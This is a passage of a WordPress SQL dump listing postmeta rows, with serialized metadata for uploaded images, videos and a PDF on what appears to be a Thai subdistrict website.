";s:8:\"filesize\";i:26827;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(3348,1236,'_wp_attached_file','2025/05/S__8544312_0.jpg'),
(3349,1236,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/05/S__8544312_0.jpg\";s:8:\"filesize\";i:363382;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__8544312_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21885;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__8544312_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:144043;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__8544312_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8641;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__8544312_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:93931;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__8544312_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20784;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(3350,1237,'_wp_attached_file','2025/05/S__8544314_0.jpg'),
(3351,1237,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/05/S__8544314_0.jpg\";s:8:\"filesize\";i:631465;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__8544314_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23218;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__8544314_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:216721;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__8544314_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8453;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__8544314_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:132074;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__8544314_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23085;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(3352,1238,'_wp_attached_file','2025/05/S__8544308_0.jpg'),
(3353,1238,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/05/S__8544308_0.jpg\";s:8:\"filesize\";i:640986;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__8544308_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25049;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__8544308_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:223162;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__8544308_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9371;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__8544308_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:136639;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__8544308_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25951;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(3354,1239,'_wp_attached_file','2025/05/S__75530242.jpg'),
(3355,1240,'_wp_attached_file','2025/05/S__8544315_0.jpg'),
(3356,1241,'_wp_attached_file','2025/05/S__8544309_0.jpg'),
(3357,1240,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/05/S__8544315_0.jpg\";s:8:\"filesize\";i:530288;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__8544315_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24178;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__8544315_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:194798;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__8544315_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8845;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__8544315_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:122564;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__8544315_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25643;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(3358,1239,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:23:\"2025/05/S__75530242.jpg\";s:8:\"filesize\";i:508004;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__75530242-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17918;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__75530242-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:144473;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__75530242-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8765;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__75530242-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:89112;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"S__75530242-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:271975;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__75530242-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22869;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(3359,1241,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/05/S__8544309_0.jpg\";s:8:\"filesize\";i:565331;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__8544309_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24539;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__8544309_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:201272;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__8544309_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9437;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__8544309_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:125175;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__8544309_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23673;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(3361,1230,'_thumbnail_id','1235'),
(3362,1230,'_edit_last','1'),
(3363,1230,'title_style','default'),
(3364,1230,'_title_style','field_5d1a0217cf408'),
(3365,1230,'related',''),
(3366,1230,'_related','field_603b51c3e183e'),
(3367,1242,'title_style','default'),
(3368,1242,'_title_style','field_5d1a0217cf408'),
(3369,1242,'related',''),
(3370,1242,'_related','field_603b51c3e183e'),
(3371,1243,'_edit_lock','1747381323:1'),
(3372,1244,'_wp_attached_file','2025/05/เตรียมความพร้อม-หนองปลาเข็ง-กอไหล่.mp4'),
(3373,1244,'_wp_attachment_metadata','a:11:{s:7:\"bitrate\";i:7961036;s:8:\"filesize\";i:136191317;s:9:\"mime_type\";s:9:\"video/mp4\";s:6:\"length\";i:133;s:16:\"length_formatted\";s:4:\"2:13\";s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:10:\"fileformat\";s:3:\"mp4\";s:10:\"dataformat\";s:9:\"quicktime\";s:5:\"audio\";a:9:{s:10:\"dataformat\";s:3:\"mp4\";s:7:\"bitrate\";i:193256;s:5:\"codec\";s:19:\"ISO/IEC 14496-3 AAC\";s:11:\"sample_rate\";d:48000;s:8:\"channels\";i:2;s:15:\"bits_per_sample\";i:16;s:8:\"lossless\";b:0;s:11:\"channelmode\";s:6:\"stereo\";s:17:\"compression_ratio\";d:0.12581770833333333;}s:17:\"created_timestamp\";i:-2082844800;}'),
(3375,1243,'enclosure','http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/เตรียมความพร้อม-หนองปลาเข็ง-กอไหล่.mp4\n136191317\nvideo/mp4\n'),
(3376,1243,'_edit_last','1'),
(3378,1243,'title_style','default'),
(3379,1243,'_title_style','field_5d1a0217cf408'),
(3380,1243,'related',''),
(3381,1243,'_related','field_603b51c3e183e'),
(3382,1245,'title_style','default'),
(3383,1245,'_title_style','field_5d1a0217cf408'),
(3384,1245,'related',''),
(3385,1245,'_related','field_603b51c3e183e'),
(3386,1246,'_wp_attached_file','2025/05/Untitled-video.mp4'),
(3387,1246,'_wp_attachment_metadata','a:11:{s:7:\"bitrate\";i:1598860;s:8:\"filesize\";i:1130008;s:9:\"mime_type\";s:9:\"video/mp4\";s:6:\"length\";i:5;s:16:\"length_formatted\";s:4:\"0:05\";s:5:\"width\";i:1920;s:6:\"height\";i:1920;s:10:\"fileformat\";s:3:\"mp4\";s:10:\"dataformat\";s:9:\"quicktime\";s:5:\"audio\";a:9:{s:10:\"dataformat\";s:3:\"mp4\";s:7:\"bitrate\";i:106740;s:5:\"codec\";s:19:\"ISO/IEC 14496-3 AAC\";s:11:\"sample_rate\";d:44100;s:8:\"channels\";i:2;s:15:\"bits_per_sample\";i:16;s:8:\"lossless\";b:0;s:11:\"channelmode\";s:6:\"stereo\";s:17:\"compression_ratio\";d:0.07563775510204082;}s:17:\"created_timestamp\";i:-2082844800;}'),
(3388,1247,'_wp_attached_file','2025/05/S__75522066.jpg'),
(3389,1247,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:4:\"file\";s:23:\"2025/05/S__75522066.jpg\";s:8:\"filesize\";i:399495;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__75522066-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17293;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__75522066-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:123257;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__75522066-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7572;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__75522066-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:79335;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__75522066-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19758;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(3390,1243,'_thumbnail_id','1248'),
(3392,1248,'_wp_attached_file','2025/05/S__75530243.jpg'),
(3393,1248,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:4:\"file\";s:23:\"2025/05/S__75530243.jpg\";s:8:\"filesize\";i:352231;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__75530243-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20132;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__75530243-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:123228;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__75530243-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8789;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__75530243-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:81854;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__75530243-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21776;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(3395,1250,'title_style','hidden'),
(3396,1250,'_title_style','field_5d1a0217cf408'),
(3397,1251,'title_style','hidden'),
(3398,1251,'_title_style','field_5d1a0217cf408'),
(3401,1254,'title_style','default'),
(3402,1254,'_title_style','field_5d1a0217cf408'),
(3404,1256,'_edit_lock','1747384144:1'),
(3405,1257,'_wp_attached_file','2025/05/4-68.png'),
(3406,1257,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:16:\"2025/05/4-68.png\";s:8:\"filesize\";i:2396722;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"4-68-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:90036;}s:5:\"large\";a:5:{s:4:\"file\";s:17:\"4-68-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:721080;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"4-68-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:38624;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:17:\"4-68-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:806839;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:18:\"4-68-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1488673;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:16:\"4-68-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:117810;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3408,1256,'_generateblocks_dynamic_css_version','2.1.0'),
(3409,1256,'_thumbnail_id','1257'),
(3410,1256,'_edit_last','1'),
(3411,1256,'title_style','default'),
(3412,1256,'_title_style','field_5d1a0217cf408'),
(3413,1256,'related',''),
(3414,1256,'_related','field_603b51c3e183e'),
(3415,1258,'title_style','default'),
(3416,1258,'_title_style','field_5d1a0217cf408'),
(3417,1258,'related',''),
(3418,1258,'_related','field_603b51c3e183e'),
(3419,1259,'_wp_attached_file','2025/05/2025.png'),
(3420,1259,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:300;s:4:\"file\";s:16:\"2025/05/2025.png\";s:8:\"filesize\";i:63588;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:15:\"2025-300x75.png\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9857;}s:5:\"large\";a:5:{s:4:\"file\";s:17:\"2025-1024x256.png\";s:5:\"width\";i:1024;s:6:\"height\";i:256;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:88022;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"2025-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:13536;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:16:\"2025-768x192.png\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:53164;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:16:\"2025-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:36953;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3421,1260,'title_style','hidden'),
(3422,1260,'_title_style','field_5d1a0217cf408'),
(3424,1262,'title_style','hidden'),
(3425,1262,'_title_style','field_5d1a0217cf408'),
(3427,1264,'title_style','hidden'),
(3428,1264,'_title_style','field_5d1a0217cf408'),
(3430,1267,'title_style','default'),
(3431,1267,'_title_style','field_5d1a0217cf408'),
(3432,1268,'_wp_attached_file','2025/05/Blue-Orange-Circle-Illustrative-Education-Logo-Photoroom.png'),
(3433,1268,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:68:\"2025/05/Blue-Orange-Circle-Illustrative-Education-Logo-Photoroom.png\";s:8:\"filesize\";i:141157;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:68:\"Blue-Orange-Circle-Illustrative-Education-Logo-Photoroom-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:52838;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:68:\"Blue-Orange-Circle-Illustrative-Education-Logo-Photoroom-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:15654;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:68:\"Blue-Orange-Circle-Illustrative-Education-Logo-Photoroom-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:66982;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3435,1270,'_wp_attached_file','2024/08/234156.jpg'),
(3436,1270,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1108;s:6:\"height\";i:1477;s:4:\"file\";s:18:\"2024/08/234156.jpg\";s:8:\"filesize\";i:111022;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"234156-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14708;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"234156-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:85402;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"234156-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6425;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"234156-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:85402;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"234156-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11330;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3437,1271,'_wp_attached_file','2025/05/ปกโครงสร้างและอำนาจหน้าที่.pdf'),
(3438,1271,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:103993;}'),
(3440,1273,'title_style','default'),
(3441,1273,'_title_style','field_5d1a0217cf408'),
(3442,1274,'title_style','default'),
(3443,1274,'_title_style','field_5d1a0217cf408'),
(3445,1276,'_wp_attached_file','2025/05/โครงสร้าง.png'),
(3446,1276,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:300;s:4:\"file\";s:39:\"2025/05/โครงสร้าง.png\";s:8:\"filesize\";i:72324;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"โครงสร้าง-300x75.png\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12079;}s:5:\"large\";a:5:{s:4:\"file\";s:40:\"โครงสร้าง-1024x256.png\";s:5:\"width\";i:1024;s:6:\"height\";i:256;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:97187;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:39:\"โครงสร้าง-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10463;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:39:\"โครงสร้าง-768x192.png\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\